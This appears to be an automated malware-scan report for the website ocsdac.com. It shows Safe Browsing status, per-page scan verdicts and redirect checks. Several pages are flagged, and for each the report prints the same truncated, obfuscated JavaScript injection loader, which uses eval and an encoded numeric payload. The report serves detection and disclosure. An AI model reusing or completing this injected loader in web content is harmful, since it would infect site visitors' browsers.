Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ocsdac.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ocsdac.com/ | 200 OK Content-Length: 7487 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/javascripts/jquery-1.6.2.js | 200 OK Content-Length: 91555 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/jquery-ui-1.8.14.js | 200 OK Content-Length: 210246 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/jquery.nivo.slider.js | 200 OK Content-Length: 15919 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/global.js | 200 OK Content-Length: 11301 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/colorpicker.js | 200 OK Content-Length: 17181 Content-Type: application/javascript | clean |
http://ocsdac.com/javascripts/demo.js | 200 OK Content-Length: 2462 Content-Type: application/javascript | clean |
http://ocsdac.com/index.html | 200 OK Content-Length: 7487 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/aboutus.html | 200 OK Content-Length: 7889 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/services.html | 200 OK Content-Length: 8020 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/tracking.html | 200 OK Content-Length: 8221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/gallery.html | 200 OK Content-Length: 4600 Content-Type: text/html | clean |
http://ocsdac.com/contact.html | 200 OK Content-Length: 9322 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5 Antivirus reports:
| ||
http://ocsdac.com/test404page.js | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ocsdac.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 31 Jul 2014 18:21:40 GMT
Accept-Ranges: bytes
ETag: "12fe2ca-1d3f-4feae9ce72040"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 7487
Content-Type: text/html
Last-Modified: Mon, 21 Jul 2014 06:56:57 GMT
...7487 bytes of data.
GET / HTTP/1.1
Host: ocsdac.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 31 Jul 2014 18:21:40 GMT
Accept-Ranges: bytes
ETag: "12fe2ca-1d3f-4feae9ce72040"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 7487
Content-Type: text/html
Last-Modified: Mon, 21 Jul 2014 06:56:57 GMT
...7487 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ocsdac.com
Referer: http://www.google.com/search?q=ocsdac.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ocsdac.com
Referer: http://www.google.com/search?q=ocsdac.com
Result:
The result is similar to the first query. There are no suspicious redirects found.